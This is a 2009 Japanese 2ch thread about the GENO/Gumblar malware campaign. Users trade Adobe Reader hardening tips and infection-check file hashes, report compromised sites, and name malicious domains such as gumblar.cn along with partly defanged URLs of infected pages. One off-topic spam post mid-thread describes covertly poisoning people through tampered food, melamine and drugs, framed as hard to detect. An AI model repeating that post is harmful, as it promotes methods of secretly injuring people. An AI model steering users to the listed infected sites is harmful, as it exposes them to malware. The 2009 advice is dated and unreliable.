重複
5 :
名無しさん@お腹いっぱい。 :2009/04/28(火) 11:01:22
解決したね 次スレいらね とか もうネタもないし 次スレいらね は、もはや様式美なのでスルーしてください。
9 :
名無しさん@お腹いっぱい。 :2009/04/28(火) 13:53:01
>>6 Judas Priest - Genocide (w
重複
>>9 GENO含めたセキュリティ対策情報のブログちゃん
>>5 ν速でftp使うなっていってた人より情報速かったな
14 :
名無しさん@お腹いっぱい。 :2009/04/29(水) 07:22:48
キャッシュ削除したらお金が降ってきました! 美女がくっついて離れません! 全てがうまくいきました!
むかし、注文個数0.001とかして遊んでたことあったろ? アレの反撃だよたぶん
このGENOウィルスも豚インフルの大流行を見越しての仕込み だったとしたならば作った奴はかなりの強者
強者 ↑これって読みは”きょうじゃ”じゃなくて”きょうしゃ”だったのか 知らんかった
諸事情でAdobe Reader 最新版を使わざるを得ない場合 2009年4月29日現在の最新版バージョン9.1設定例 1.Adobe Readerを起動し「編集」メニューの「環境設定」 「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す) OKを押して設定確定後、Adobe Readerを終了。 ↓ 2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理 設定は SpeedUp - Fast がおすすめ。 注意すべきは Acroform(拡張子なし) Annotations(拡張子なし) これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。 そうしないと Adobe Reader が起動しなかったりする。 このとき追加作業として EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと より安心かもしれない。 以下はお約束 上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。 またAdobe Reade以外の環境設定をどうするかも各自考える必要があります。
>>19 ShellExView などで Adobe PDF Link Helper を無効にしておくと、よりいいかも。
無効にしても「PDFファイルが全然開けなくなる」訳ではなさそう。
蛇足だが
×>Adobe Reade
○>Adobe Reader
>>19-20 Adobe Reader Speed Launcher をスタートアップから外す
こともやったほうがいいですよ。
レジストリの書き換えが必要ですけど
「いじくるつくーる」などのソフトを使えばレジストリを意識せずに楽勝です。
>>19-21 これは本当のことですか?
それとも釣りですか?
なんかもう何を信じていいのかわからない…
>>18 釣られてやろう
いまどきの中国産のIMEは
コワモテは変換できてもツワモノは変換されない
強面 兵
漢字二通りあるからなあ
GENOは対応が糞レベルだったんで晒しておいても問題ないが、 zlkonでも検索できるようにした方が良かったんじゃないかな?
これはGeno? yaplogjp.com/blog/
>>28 違うけどヤプログの偽者
MMO界隈で有名な中華のドメイン
アカウントを盗む目的でキーロガーを仕込む
MMO界隈で有名なドメイン名の例(GENOウイルスではないが危険) アカウントハック(アカウントを盗む)目的で、キーロガーを仕込む 踏むな危険→yaplogjp.com←踏むな危険 踏むな危険→atewikijp.com←踏むな危険 踏むな危険→gomenifty.com←踏むな危険 踏むな危険→aimeblog.com←踏むな危険 踏むな危険→cavle-online.com←踏むな危険
次スレいらないね
GENO社員乙
ラトビア特急、路線拡大中 2009/04/09(木) 7560 個 2009/04/17(金) 8567 個 2009/04/19(日) 11795 個 2009/04/27(月) 15096 個 2009/04/30(木) 13456 個のドメインを感染させています。 少し落ち着いてきたかな?
35 :
名無しさん@お腹いっぱい。 :2009/04/30(木) 14:32:19
プ
>>28 踏んでしまったとしたらOS入れなおし推奨だよ
このウイルスってPdfが読めないと感染しないのでしょうか? もしそうだとしたら例えば普段 Foxit ReaderをUSBメモリに入れて置いて、読むときだけ繋げたりしたら…。 面倒くさいですけど。
感染して自分のサイトにスクリプト埋め込まれた。 サイト直して、OSクリーンインスコしたが、また自サイトがやられてたので、 FTPログ調べたら、海外から勝手に書き換えられてた模様。 感染中に接続したFTPのIDとPASSがどっかに送られてたんだろうな... FTPのパス変えないと他の感染マシンからやられる感じだ。 .htmlファイル は bodyタグの前に、 .jsファイルは最終行にそれぞれ埋め込まれてたお。
>>40 誠にお恥ずかしい。
パス変えて、こまめにログチェックするお
2箇所からアクセスがあって、どっちもIPの割当国はアメリカだった。 多分、どっかで感染したクライアントPCじゃないかな。
アクセス元はきっとゾンビだと思うよ
>>44 うん、その辺も全部変えた。
FTPログ見たら、書き換えられてから直すまでの訪問者ゼロwww
Orz
間違い。FTPログじゃなくてWebの方のアクセスログね...Orz
ゴールデンウィークはOSのクリーンインストールをしましょう!
49 :
名無しさん@お腹いっぱい。 :2009/04/30(木) 21:13:35
>>46 普段それなりに閲覧者がいるサイトだったとしたらそれは不自然かもしれない
元から自分のオナニー用サイトなら問題ないかも
ログファイルを書き込みロックしたり上書きしたりなんてことも
ありえるのかなーとおもったけど、どうなんだろうね
>>49 異常あるようには見えない
なんでもかんでも壊れたっていうんじゃなくて
自分の環境を疑ったほうが良いと思うよ
53 :
名無しさん@お腹いっぱい。 :2009/04/30(木) 21:44:16
Adobe Readerなんてほんとインストールするもんじゃないな
PDF表示だけにしときゃいいものをゴテゴテ機能付けるからこうなるんだよな・・・
アドビは重くて穴だらけだな
( ´・ω・) みんな〜メキシコ土産だよ〜 ( っ¶¶と (ニ二二二ニ) )=========( () .() | /ヽ======/、 (( レ |ヽ_/、| )) |/ | |/ /ハ ヘ⌒ヽフ ( ・ω・) { U Ul ヾ.,____,ノ
___ハ__ チャ 、____丿 チャ ゙゙( ゚━゚) アミーゴ チャ /゙゙゙c○c○)) アミーゴ チャ __ハ__ チャ 、____丿 チャ (゚━゚ )´´ ハバネロ ((( ○。○。゙゙゙\ ハバネロ
>>51 よく居るんだ・・・
手元のPCがおかしいのに
「サーバーにつながらない!なんか設定変えた!?(怒」
「ネットワークできないんだけど!バグってんの!?(怒」
とか電話してくるやつがさ。
まずは隣の人に聞けっての('A`)
Adobe Readerはadmとかで設定を集中管理出来ないもんかね。
次スレいらないなぁ
ファイル書き換えしちゃうから駆除はできても元に戻るわけじゃないのよね 駆除自体もファイルがころころかわるから難しいみたいだし
きりがないからネット用のPCは別にした ダウンロードしたファイル置き場も別にした これはこれできりがないかも。。。
66 :
名無しさん@お腹いっぱい。 :2009/05/01(金) 15:25:38
Adobe Readerもういらない。 アンインストールしようとしたら なかなかしぶとかった。 で、PDFは何でみようかな。。
>>66 PDFを見れるマンガビューワーで良くない?
AdobeFlashの代用ってあるんだろうか?
全てsandboxie上で実行すれば
69 :
名無しさん@お腹いっぱい。 :2009/05/02(土) 03:33:24
70 :
名無しさん@お腹いっぱい。 :2009/05/02(土) 03:59:44
これってFTP接続時にハックされるの? それともFFFTPなんかのソフトにあるリストをハックするの?
71 :
名無しさん@お腹いっぱい。 :2009/05/02(土) 04:23:20
このウイルスに感染すると winnyとかshareに異常がきたすって有るかな? 両方とも今までに無いエラーでおちた
73 :
>>71 :2009/05/02(土) 12:18:13
/ ̄ ̄ ̄ / /''7 ./''7 / ̄/ /''7 ./ ./ ̄/ / /__/ / / ____  ̄ / / 'ー' _/ / ___ノ / /____/ ___ノ / /___ノ /____,./ /____,./ _ノ ̄/ / ̄/ /''7 / ̄ ̄ ̄/ / ̄/ /'''7'''7 / ̄ /  ̄ / /  ̄ フ ./ / ゙ー-; ____ / / /._  ̄/ / ___ノ / __/ (___ / /ー--'゙ /____/ _ノ /i i/ ./ /__/ /____,./ /___,.ノゝ_/ /_/ /__,/ ゝ、__/
71が叩かれるのはなぜ?
蹴飛ばし推奨ドメイン gumblar.cn
80 :
名無しさん@お腹いっぱい。 :2009/05/02(土) 23:23:54
81 :
名無しさん@お腹いっぱい。 :2009/05/03(日) 04:23:27
>>61 サーバがおかしいのに自分の使用しているPCに原因があると思って
いろんな設定いじったり、アンインストールしたりした事無いだろお前は
次スレいる?
83 :
名無しさん@お腹いっぱい。 :2009/05/03(日) 11:55:19
******* 危険 *******
照英 オフィシャル・サイト
hxxp://www。s-progress。com/talent/show-a/
Analysis report for hxxp://www_s-progress_com/talent/show-a/
現在感染中(6日目に突入)
一応メール送ってるけど反応なし
2009.05.03 AM08 JST 継続
ソース↓
ttp://www3.atword.jp/gnome/
>>83 乙w鎮火するどころか新型インフルみたいにヌルヌル進行してるな
照英のも同型?
GENOウイルスは進化してマッチョウイルスになった?
GWで鯖缶もいないって状態なんだろうか
>>81 ユーザがおかしいのに自分の管理しているサーバに原因があると思って
いろんな設定いじったり、アンインストールしたりする事あるのかお前は
91 :
名無しさん@お腹いっぱい。 :2009/05/03(日) 17:21:15
大手が感染したらやばいな
92 :
名無しさん@お腹いっぱい。 :2009/05/03(日) 19:17:04
今回のウイルスってアクロバットリーダーのバージョン5 とか古すぎるやつにも対応してるの? もし対応しててアウトならfoxitかな。最新版は重すぎるし。 でもfoxitはたまに読めないやつがあるんだよな。
んな古いのはもう論外だろ
でも余計な機能が付いていないから踏んでも何も起きないんじゃないかと思うが
>>94 ただ、もし脆弱性があったとしても、放置される可能性があるけどな。
>>94 とっくに塞がれた他の穴が山ほど空いてるだろ…
放置される可能性があるなんてレベルじゃなく、ほぼ確実に放置なんじゃねーの? >余計な機能が付いていない 表現能力が低い素のHTMLであってもそのブラウザに致命的なバグがどれだけあったか思い出せば、ね そもそもPDF自体がPostScriptに色々機能をくっ付けた形式なわけで
>>94 javascriptの機能がないバージョンなら問題ないだろ
mosaicが懐かしい・・・
>>99 Mosaicを実際に使っていた日本人ってかなり少なくないか?
翌年にはNetscape Navigatorが出てたし。
PC98にFreeBSD(98)にX-WindowでMosaic 楽しかったな・・・
>83にあるURLをわざわざ踏むなんて……
107 :
名無しさん@お腹いっぱい。 :2009/05/04(月) 15:01:21
>>102-103 てFLASHとreader最新にしとけば大丈夫とか関係なし?
踏んでないんだが、URLだけだと不意打ち食らうとキツイね。
firefox&NoScriptだったら、だいじょぶなのかな
>>108 >てFLASHとreader最新にしとけば大丈夫とか関係なし?
Yes
>firefox&NoScriptだったら、だいじょぶなのかな
なおさら何の問題無い。(ただし、Noscriptの設定が全サイト許可になっていない場合)
110 :
108 :2009/05/04(月) 15:14:25
>>109 d
>>104-105 が踏んで…になってるから不安になっちまいました。
ここにいてもまだ対策してなかった or ギャグ なのかな?
適当な記事にウソリンクでこれ貼られたら無防備に踏んでしまいそう。。
>>107 最も罪に問われるべきは改竄した奴、
次いで(ゴールデンウィークとは言え)放置してる鯖管だろw
113 :
名無しさん@お腹いっぱい。 :2009/05/04(月) 15:35:45
102踏んでしまった・・・MACでも感染するのでしょうか?
心配するぐらいなら、クリーンインストールしとけ。 パスワードやデータが流出してからでは遅いぜ。
鑑定スレじゃねーんだ失せろ
>>115 実際にソース見てみると良いよ
最初の1000行以上が空白
Oracleって言うウィルスに感染してる
それはたいへんだ やばいんじゃないか
119 :
名無しさん@お腹いっぱい。 :2009/05/04(月) 17:59:45
>>117 mjd?
オレこないだjavaダウンロードしちゃった!
それにもウイルス入ってんのかな!?
>>117 の「最初の1000行以上が空白」について
参考までにWindows上のテキストエディターにて改行を数えてみたところ、
最初の空行(改行だけの行 および タブ+改行だけの行)は224行でした。
結局GENOウィルスとはなんだったのか
人生
>>120 結局このウイルスはGENOとは違うみたいだがたいていのアンチウイルスソフト入れてれば防御&検知可能なの?
もうあれから行ってないなあ・・・お気に入りから速攻削除したし、行く気もしないな。
さすがの情弱ももうそろそろあすこは危ないって気づいてるだろ
127 :
名無しさん@お腹いっぱい。 :2009/05/04(月) 20:45:11
GENOウイルスについてのまとめサイトのURLってどこだったっけ?
忘れたが全然更新してなかった希ガス何故か誰も利用しない
130 :
名無しさん@お腹いっぱい。 :2009/05/04(月) 21:40:13
ありがとう
132 :
名無しさん@お腹いっぱい。 :2009/05/04(月) 23:26:10
>>117 カスペで何もデナカッタヨ.
誤検知じゃないの?
>>132 あんたは、Oracleについてぐぐってこい。Sunを買収したとこだよ。
皮肉で言われていることだって気付くのが普通。
GENOウイルスでオタオタする人がオラクルについていちいち知ってるわけないだろ 本気で困るやつもいるんだから、ここだけは親切にいこうぜ
136 :
名無しさん@お腹いっぱい。 :2009/05/05(火) 01:00:10
>>136 気にすんなw
知らないことなんて誰にでもあるさ
ver.5は大丈夫なのか。
インスコしてるアンチウイルスソフトのテストしたいんだけど どっかにウイルス置いてるとこないですかね
>>141 ありがとうございます
どうやら無事仕事してくれていることを確認しますた
2ちゃんってほんと色んな事に詳しい人がいるんだなぁ…
>>19 さん、疑ってごめん。
144 :
19 :2009/05/06(水) 15:28:44
許さねぇ・・・ もう誰も信じねぇ・・・
GENOって店、いまはもう大丈夫なの?
149 :
名無しさん@お腹いっぱい。 :2009/05/06(水) 17:50:46
150 :
名無しさん@お腹いっぱい。 :2009/05/06(水) 20:45:13
やっとOS再インスコしてきたよ もうGENOは開かない キャッシュ削除で証拠隠滅しようとしたことは絶対に忘れない
>>151 オレもろくな対応をしなく誠実さの欠片もないホビコンのサイトは二度と覗かない
昨日開催のイベントで謝罪広告が一切無しなのは許せない
忙しくてOS再インスコするまで2週間もパソコン使えず迷惑した
>>154 ホビコンでも2回くらい同じような書き込みしてただろw
今あそこは疥癬があれこれかえてウレチーって言ってるだけのアホスレになってるから
書き込むだけアホらしいよ。
運営がどうしようもないのはディーラーならよく分かってるからWFとトレフェスで頑張れ。
>>156 AVGとの組み合わせだと、どうでしょうか?
>>157 知らね。
入れてみればいいんじゃない?
機能も細かく個別に切ったりもできるし。
万が一他のプラグインとの食い合わせが悪かったら捨てちゃえばいいだけでしょ。
www.beauty-wed.co.jp なぜかここはgumblarがalertになってる。注入失敗?
160 :
名無しさん@お腹いっぱい。 :2009/05/07(木) 20:45:01
>>160 その広告が掲載されてるポイントサイトにメールした。
今日になって広告が消されていたのが3サイト。
(へそクリック そんなバナナ preco)
そのままなのが2サイト。
(つぼマイル おこづかい生活)
ホースマンクラブっての自体は今でもヤバいの? aguseで調べても問題が検出されないんだよな。 生で踏む勇気はないw
1時間くらい前に見に行ったら直ってたっぽい。 ちなみにその前はAVASTがガンガン反応してた。 サイト管理者のPCが直ってるかは不明w
156入れたら技術系サイトが表示されなくなった 無理やりjavascriptで書き換えてバグるっぽ
>>165 例えばどこあたり?
@ITなんかは普通に表示できてるけど。
ビッグ3破綻とインフルエンザですっかり影をひそめちまったな もっと頑張らないと忘れられちまうな
168 :
名無しさん@お腹いっぱい。 :2009/05/08(金) 19:03:37
おーい 今さっきGENOからメールきたんだけど もうwebサイトの方はういるしゅ抜きに戻ったの? 店舗に行くか・・・というかそこで買うのもなんか嫌だから 似たような店教えてくれ←感染しないとこおねがいw
>>168 > もうwebサイトの方はういるしゅ抜きに戻ったの?
今のところは大丈夫なのかもね。
どんな対策を取ったのかまったくわからないから、パワーアップした
新種のGenoウィルスを食らう覚悟が必要だなw
数日おきに入れ代わってるからな、GENOウイルス本体は。
じわじわ感染が広がってるな GENOの最初の対処がまずかったのも一因か
maidなんとかってのは踏んだことはないが、2ch見てたら自動的に踏んでるってこと? もう勘弁してくれよ・・そういうのわかんないんだよ・・・
ヌーブラ愛用してます
>>169 ,170
ほんとかよ・・・何が原因かわかってないのね
専ブラ使ってる。 使ってたら大丈夫?
178 :
名無しさん@お腹いっぱい。 :2009/05/09(土) 00:11:55
181 :
名無しさん@お腹いっぱい。 :2009/05/09(土) 01:57:30
汚染米とラジコン
http://gimpo.2ch.net/test/read.cgi/radiocontrol/1212811357/337- http://gimpo.2ch.net/test/read.cgi/bouhan/1239734019/20- カビ毒米って便利いいよね。
普通に食べて肝臓癌にして殺すことできるもんね。
気づかれずに何度も侵入、そのたびに米びつのお米をカビ毒米と交換、
後マヨネーズや醤油、ソース、ケチャップ、みりんなどなど毎日少しずつ使うものに弱毒性の毒物を入れておく。
ターゲットは一年以内にアポーン。
気づかれそうになったら若年性統合失調症とか何とかいえば誤魔化せます。
http://www.tk-telefilm.co.jp/gaslight.html 夜になると不思議と暗くなる部屋のガス灯…それに気づくのは私だけ…。
精神的に追詰められる心理サスペンスの傑作!
昔々から精神病ってエロエロと利用し甲斐があるようで、、、、
ガスライティング----で検索 ガス燈の映画の影響か欧州ではよく知られた方法
メラミンやシュウ酸の粉末を砂糖や塩、牛乳に混入。確実に結石(総胆管結石、尿管結石)になる。
あかちゃんなら異物混入が疑われるが40代50代なら本人の病気ですんでしまう。
あと降圧剤や昇圧剤、利尿剤などなどいろいろあるみたいだね。
これらは砒素のように明らかな毒物でもないから発見されても犯罪の立証がむずい。
薬物毒物と鍵屋の組み合わせは非常に厄介だ。
プロの鍵屋にかかれば開かない鍵はないといわれている。
皆さま、家族全員が留守にする時はお気をつけあそばせ。
あと、尿酸とある種の(現在不明)ある種の薬物を加えると膝痛や腰痛を起こすことが出来るようだ。
重いものを持っていないのに急に腰が痛くなったなどというとき、
ひょっとすると、ひょっとするかもしれませんよ。
旅先での見も知らない人からのドリンクサービスや席を外したあとの飲み物なども危険がいっぱいですよ。
泊りがけの飛行会の後体調異変はありませんか。
---------------------------------------------
みんな気をつけようね。
どんな一流の鍵屋でも無傷で開けられない鍵作らないと、、
現状では一流の鍵屋ならどんな鍵も開けてしまう。
暴力団が借金漬けの鍵屋を支配下に置いたらやりたい放題だよ。
EXQAUTOのウェブサイトもやられたね。 連休中は死亡状態だったが、今は復旧している模様。 但し、感染にかんするコメントは出されていない。 (闇に葬った可能性大!) 5月6日までにアクセスした人はクリーンインストールよろ。
マジで被害広がってるじゃん。 世間じゃ全く話題にならないけど…
185 :
名無しさん@お腹いっぱい。 :2009/05/09(土) 09:16:49
>>182 www.freaksstore.com のウェブサイトに含まれている gumblar.cn のサイトの要素に、
コンピュータに損害を与えたり無断で動作する不正なソフトウェアが含まれている可能性が
あります。不正なソフトウェアを含むサイトにアクセスするだけでコンピュータに感染する
場合があります。
186 :
名無しさん@お腹いっぱい。 :2009/05/09(土) 09:33:15
>>184 まぁいいんじゃね?
そのうち職場のやつらが騒ぎ出したら笑いこらえるのがタイヘン
>>182 難読化されたJSコードが挿入されている。
UAを調べてVista未満のWindowsだとgumblar.cnに飛ばす。
188 :
名無しさん@お腹いっぱい。 :2009/05/09(土) 09:46:38
Genoウィルス怖いねー
AVG
192 :
189 :2009/05/09(土) 10:24:19
>>191 そのIDの人とは、別人です。GENOも最初見つかったときは、対応しているセキュリティ
ソフト少なかったから未知のウィルスの対応ってどうすれば、いいのかな?って思って質問
したのです。さっきのリンク先は、URLチェッカーだと安全って表示されてたしね
193 :
189 :2009/05/09(土) 10:26:13
リンク先飛んだんだが、javaきってるからAVGが反応してくれるのか分かんないよ・・・
gumblar.cnはgeno以上に活動してるな
>>187 アドレス変わったのか
zlkonは途中で経路切られて終了かと思ったのに
197 :
名無しさん@お腹いっぱい。 :2009/05/09(土) 10:49:30
なぁなぁ、感染してるっぽいサイトをGoogleで検索しただけでavast先生が警告するんだが これってどうなってるの? ひょっとして対策してなかったらググっただけで即感染するのか? 例)「村民」で検索したら一番最初に出てくる村民バスのうんたら〜ってサイトが感染してる らしくavast先生が反応する。 ※当然だけど試すなら対策してからやってくれ
>>199 これも
>>182 と同じだな。難読化のやり方は違うけど処理はまったく同じ。
avastがどう判断してるのかわからないけど、
ググっただけで感染するのはGoogleが改竄されたときだけ。
>>199 やっかいだな
対応していないアンチウイルスソフトが多すぎる
Adobe ReaderとFlash Playerを最新版にして、Javascriptを無効にしてても 感染しちゃうのでしょうか?
散布元がこれだけファイルをコロコロ変えてくるとシグネチャ定義では対応できません。
>>202 感染します。
感染後の、AdobeReaderを利用した動作部分のみ行なえないだけで、他の動作はするでしょうね。
常駐してftpサイト更新を検知したら〜とか。コマンドプロンプト出そうとしたら起動できないとか。
ほぼ日替わりで本体が入れ代わってるので、その日に、どんなものが落ちてきて実行されるかなんて
わかりません。業者の方が撤退しない限りは、PG2などで、gumblar.cn の範囲をブロックするのが有効です。
Javascript無効なら感染しないんじゃないの?
お気に入りの通販サイトなんかあったらjavascript有効にするだろうから 普通のサイトが突如ウイルス拡散することになるのは恐怖だな。
さっきPDF開くようなサイトじゃないのにAdobe ReaderがJavaScriptがONじゃないと表示されないよと 警告してきた。Adobe Reader9のJavaScriptは切ってる。これはもしや引掛ったか?
>>199 感染するかは分からないけど、先読み無効に出来るみたい。
ttp://www.google.com/help/features.html リンク先読み機能 - プリフェッチ
一部の Google 検索については、ユーザーがクリックする前に最上位の検索結果のダウンロードを開始しています。
そのため、最上位の結果をクリックすると、リンク先ページが高速で読み込まれます。
この特殊なプリフェッチ機能は Firefox および Mozilla ウェブ ブラウザだけで、Internet Explorer などの他のブラウザではご利用いただけません。
Mozilla のプリフェッチ FAQ に記載されているとおり、プリフェッチ機能はウェブ ブラウザの設定で無効にできます。
Firefox でプリフェッチを無効ににする方法:
アドレス バーに「about:config」と入力します。
「network.prefetch-next」の設定まで下にスクロールし、値を「False」に設定します。
>>208 リンクされない程度に削ってURLうpおね
>>210 h++p://cmd-pro.com/m_com.html
>>209 先読みが静的データとしてバックグラウンドで読んでるならいいのだが、違ったら感染するな
>>211 gumblar.cnだな。
あと、そこと同じようなレイアウトのサイトが他にもいくつかあるんだが、
もし管理者が同じ人物なんだとするとftp経由で軒並み改竄されるかもしれない。
ちょっと確認したところでは
www■wa-purokentei■com
は改竄済み。
>>208 Adobe側のScriptをオフにしといたんだろ?
メッセージを鵜呑みにしてオンにしなきゃセーフ
>>213 了解した。サイト管理者に通告すべきだな。
あと、acroreadのJavaScript切ってたら大丈夫だろうか…
今a-squaredでスキャン中なのだが。
>>214 ONにはしなかった。一応だけど調査継続しておく。
>>216 切ったままでオンにしなきゃ大丈夫。
その状態でわざと踏んで検体拾って送ったりしてるんで。
>>218 今のところ平気。
ちなみにFoxit用のコードも実戦投入されているので
FoxitもScript切らないとだめくさ(設定箇所は同じ)。
>>212 それはまずい
けど、そんなに問題ならもっと以前から騒がれてる気がするけど
結構昔からついてる機能みたいだし
これに感染したっぽくてバックアップデータを取って OSを再インストールしたいんだけど インスコし直したPCにバックアップデータを入れても ウイルスってついてこないのかな? こういった感染例ってありますか? 新OSでスキャンして反応なかったら大丈夫なのかな
管理してるサイトに置いてあったPHPに例の一行目と、HTMLにjsが追加されてるのを発見 クライアントPCは感染していないのを確認 実は数日前、レンタルサーバー屋さんに速度がらみでのなにかしらの処理をしてもらった のだが、これが原因ということはありますかね? サーバー屋さんが感染してるとか…
223 :
名無しさん@お腹いっぱい。 :2009/05/09(土) 22:23:19
>>221 単純にそれだけ聞く分にはまだダメじゃないか?
・FTP他のパスワードを新環境側から変更する
・手持ちのHTML系データは手作業で感染チェックする
・バックアップソフトで一括バックアップはしない
・アンチウィルスが全て対策してるわけではないので、信用しすぎない
HTMLの手動チェックは辛いところだが、他は最低限気にすべきかと思う
これだけ感染が拡大してるのに世間の盛り上がらなさは異常。
>>222 どうだろうね。
ftpのパスを抜かれて改竄されるみたいなんで
鯖屋さんがftp経由で更新してたらその可能性もあるかも。
あとクライアントPCが感染してないと判断した根拠が何なのかってのも問題になる。
この種類の攻撃だとdropperも本体もサーバ側で入れ替えし放題なので、
アンチウィルスで検出できないだけでクライアントPCが実は感染してましたってことも考えられる。
>>227 全体的に広がってるけどちゃんと対応するのが医療関係だけで
ほかはもみ消したり気づいてなかったりするかんじ
GENOとしては「うちだけじゃないからw」ってことで一安心だろう。
gumblar.cn踏んだ後にUDP52468で色んな所からアタック来ない?
>>230 糞みたいな対応したのは数少ないけどねたぶんw
GENOから感染したってのが多いだろ
5月1日時点のGENOウイルス感染数(初期GENOウイルス) 日本 13,024件 ・・・・・・・・・・・・・・・・・・・・・・・・・・・。
なあ、このウイルスってもうYahooのトップで警告しなきゃならないくらいのレベルだよな? 削除があまりにも難しく、しかも亜種が続々。 なんでダンマリなの?
詳細が不明だから
237 :
名無しさん@お腹いっぱい。 :2009/05/10(日) 21:49:23
照英のサイト改竄は芸能人だし、これをきっかけに ニュースにもでもなるかと思ったけど静かなもんだね
IPAすらGENOウイルス自体を知っているとも思えないが。
IPAは身内が感染しちゃうぐらいだしなぁw
誤爆か
242 :
名無しさん@お腹いっぱい。 :2009/05/11(月) 02:27:01
243 :
名無しさん@お腹いっぱい。 :2009/05/11(月) 02:28:38
IPAにso-netのセキュリティ通信が上手く纏まってるので見ろと 役立たずのIPAは解散しろと言っておきました これで少なくとも把握してないと言う事にはならないでしょう
gumblarをブログに書いたら その記事にLACからアクセスあったので 知らないとは言わせない(´・ω・)ス # あとはJPCERTか?
結構、企業からも個人がアクセスしているだろうから、そのうちとんでもないことに
>>244 so-netのセキュリティ通信便利だよね、よくまとまってるし
一般人にもすすめ易い
必ずしも速報性はないけど大手にしては上出来
アンテナとしてキュリティホールmemo見てるけど、他の人にはすすめにくいからなあ
他に一般人向けでそこそこ情報補足が早いとこ知ってる人いる?
テレビやラジオで少しの時間で良いからインターネットのセキュリティに関するニュースを毎日流して欲しいと思っています。
>>247 一連の記事、なんか違和感があると思ったら、「Adobe」が軒並み[Adbe」に
なってるんだな。
>>249 ほんとだw
対策方法の情報ページのはじめの3つだけAdbeになってる
教えてあげたら寸志もらえるかな?w
「ご指摘ありがとうございました」の返信だけだろ
これって検出するのはどうしたらいいの?
>>252 感染の可能性を低くする方法はあるが、検出できるかどうかは運次第。
どんどん新型に置き換わってるから、アンチウィルスもシグネチャベースの対応は
追いついていない。
じゃあおまえらは どうやって気付いたの?
>>254 Chromeが遮断してくれた。運がよかった。
>>254 いつものようにGENOのサイトをひやかしにいったら、なんか重くてブラウザハングしたから
同じ様な奴を捜しに2ちゃんでスレ探して、ウィルス感染に気づいてクリーンインストールw
どんどん新型でてるなあ
それで結局、 どうやったら検出できるんだよ??
259 :
名無しさん@お腹いっぱい。 :2009/05/12(火) 02:07:03
あはは
これって AdobeReader7.1.1 と FlashPlayerを最新にすると感染しないの?
この脆弱性は、 Adobe ReaderおよびAdobe Acrobatの 現行バージョンであるバージョン9.1および 8.1.4と、 旧バージョン(7.1.1以前)に影響があり、 Windows版、Mac版、Linux版の すべてが影響を受けるとしている
最近落ち着いてるがいつ暴れだすか分からないからスレが閉じれない まるでインフルエンザだウィルス繋がりでも
>>171 もGENOっぽいけどserver.maido3.comは鯖が違うからセーフ?
adobeの対策版予定は今日だったな 時差の関係で夕方くらいかな?
H1N1よりもこっちのほうがpandemicになってるのに マスコミは全く取り上げないな
都合の悪いことは先が見えるまで後回しが基本だからな
270 :
名無しさん@お腹いっぱい。 :2009/05/12(火) 12:48:45
今日は月例UPdateだね
PowerPointしかないからどうでもいいけどな それよりAdobe仕事しろ
Microsoftセキュリティ対策センター(MSRC)のブログによれば、 今回はOffice関連のアップデートとなるため、Windows Update経由では 配布せず、Microsoft Updateサービスを通じての提供となる。 セキュリティ情報と併せて、悪意のあるソフトウェアの削除ツール 更新版と、セキュリティ以外のアップデートもリリース予定だ。
Windows7登場は年末にずれ込んだんですね 年末には何が起きるんでしょうかww
Windows7発売 豚インフルが変異し強毒性を得て大流行 世界的大恐慌 来年には世界的戦争状態に もうメシウマで今からおしっこ漏れそうです
>>248 GENOみたいに対応を全くしないで放置してる情報が流れたらえらい事になりますw
短縮URLテロどころじゃないですよ
>>275 情報なしで、2ちゃんで感染サイトを貼り付けられまくると
感染者増えるじゃね?
しかしAdobeは糞だなぁ Adobe ReaderもCommon Filesのadobe_update.exeも 自動更新はオフにしてるのにそれでも外に出ようとする 行儀悪すぎ
消せないファイルが残るしな
消せないファイルあったなー どうやっても消せなくていろいろやったあとゴミ箱にドラックしたら普通に捨てれた
そのファイル、今ごろゴミ箱の中で繁殖してるぞ
windowsからじゃ消せなかった気がするが・・・ knoppixから消したんだけど、結局気持ち悪いからOSごと入れなおした ゴミ箱ドラッグは試してなかったかも
283 :
名無しさん@お腹いっぱい。 :2009/05/13(水) 03:19:56
キタ━━━━(゚∀゚)━━━━!!!
sqlsodbc.chmってどうやってみつけるんだ?無いのだが・・・
感染しているか確認 どうやら感染するとC:\WINDOWS\system32\sqlsodbc.chmが上書きされる様子 これのハッシュ値を確認してみるといいかも ファイルサイズが大きく違うのでよくわかんなかったらそっちでどうぞ 作成日時や更新日時は環境によってバラバラなのでとりあえず無視してもOK 正常なsqlsodbc.chm ファイルサイズ:50,727バイト CRC32:B61C7A80 MD5:F639AFDE02547603A3D3930EE4BF8C12 SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3 上書きされたsqlsodbc.chmの例(あくまで例でありこの限りではない) ファイルサイズ:1,323 バイト CRC32:7585CBB6 MD5:BF7209B9589AD09A25740F6D47D0ADEA SHA-1:D695F957AA9DEB0E4D92F4546DB3A883B1909008 とりあえずこれチェックして大丈夫なら安心だろ
僕達の感染はこれからだ! GENO先生の次回作にご期待ください。
げろの名が大きく広まった事件であった その事件は未だ解決までに至っていない
>>287 sqlsodbc.chmの正常な値はインストールされているSQL ServerやMSDEの
バージョンによって違うよ。
296 :
名無しさん@お腹いっぱい。 :2009/05/13(水) 10:21:31
ウィルス感染してるか調べる明確な方法はないのだろうか
>>292 インストーラは9.1.0のままなので
[ヘルプ][アップデートの有無をチェック]で
9.1.1にしておくこと(とっくに9.1.0の人も)。
Adobe Reader 7/8/9すべて対策が講じられたということでいいのかな?
んだね。もっともパッチ当てない奴が山ほどいそうだが。
進化したGENOウイルスがそれすらいずれ突破してきそうで怖いな
クライアントPCへの侵入経路が今ひとつわからないんだよな。 クライアントPCに対してもWebに仕込まれるのと同様、Adobeの 脆弱性を突かれてるんだろうか。
>>297 「アップデートサーバが応答していません。サーバが一時的にオフラインになっているか
インターネットまたはファイアウォール設定が正しくない場合があります。
後でもう一度やり直してください」
と出るんだがどうしたらいいの?
はぁ、もうこんな生活疲れたよ…
>>299 だめだ、アクロバットリーダーの7のアップデートがあたんね
くそあどび
糞はお前だ・・・・。
全然おさまらないじゃん、GENOウイルス…
本番はこれからだ!GENOぉぉぉぉぉぉぉぉ!
スイマセン フラッシュは最新版で 偶然にもアドビリーダー入れてなかったんですが 感染して無いでしょうか
感染してますん
誰かエスパー呼んでこいよ。
好きだと言い出せないうちに あなたのロッカー奪ったラブレター
アンインストールするのが確実
